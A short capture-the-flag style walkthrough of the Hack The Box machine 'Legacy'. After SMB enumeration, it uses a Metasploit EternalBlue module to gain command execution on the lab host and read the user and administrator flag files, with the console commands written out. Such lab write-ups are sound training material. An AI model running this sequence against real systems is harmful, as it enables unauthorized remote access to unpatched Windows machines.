This is going to be a fast walkthrough. Nothing fancy here, I’m just going to switch over from vulnhub boxes to hackthebox boxes and I wanted to start with an easy one.
Many of these machines I have already rooted, like this one here.
Legacy’s only real challenge is if you want to run non-metasploit exploits against it. For some reason I was having a super difficult time getting the exploit-db python exploits to run on my Parrot-OS instance.
The exploits weren’t built for python3 and I didn’t want to waste time trying to convert them. So naturally I tried using python2 which is also installed but when I went to pip install the missing modules, pip2 wasn’t installed and apt-cache didn’t have any available for download! lol
So I decided to just MSF this box and move on.
Exploiting Legacy
Well before we can exploit it, we need to see what services it has running.
Looks like just an smb server is running.
Next I run enum4linux against the target to see what info we can rip out of it
Not a ton of super useful info other than there’s no null sessions available so I guess we can rule that one out.
This leads me to believe that since this is supposed to be an easy box they’re probably looking for something simple like the Eternal Blue exploit.
Now I tried using the exploit-db exploits. Maybe it’s too late or I’m too lazy but I didn’t feel like upgrading exploits to work with python3 lmao
So I took the easy route and went with Metasploit for this box
search eternal
use 3
set RHOSTS 10.10.10.4
set command dir
run
Looks like it’s vulnerable and that we got command execution. We’re sitting in the System32 directory.
set COMMAND systeminfo
Now it’s just a matter of finding our flags
set COMMAND dir "c:\Documents and Settings\"
We’ll try and get john’s flag first. It’s usually on the desktop for windows machines
set COMMAND dir "c:\Documents and Settings\john\Desktop
Yup, there it is. Now we can get it by just typing it out
set COMMAND type "c:\Documents and Settings\john\Desktop\user.txt
Next we’ll see if we can get our admin flag
set COMMAND dir "c:\Documents and Settings\Administrator\Desktop
That’s it!
Not a ton to say about this box. Not really that difficult to do with metasploit. Maybe I’ll switch OS’s and see if I can get the manual exploits to work on Kali
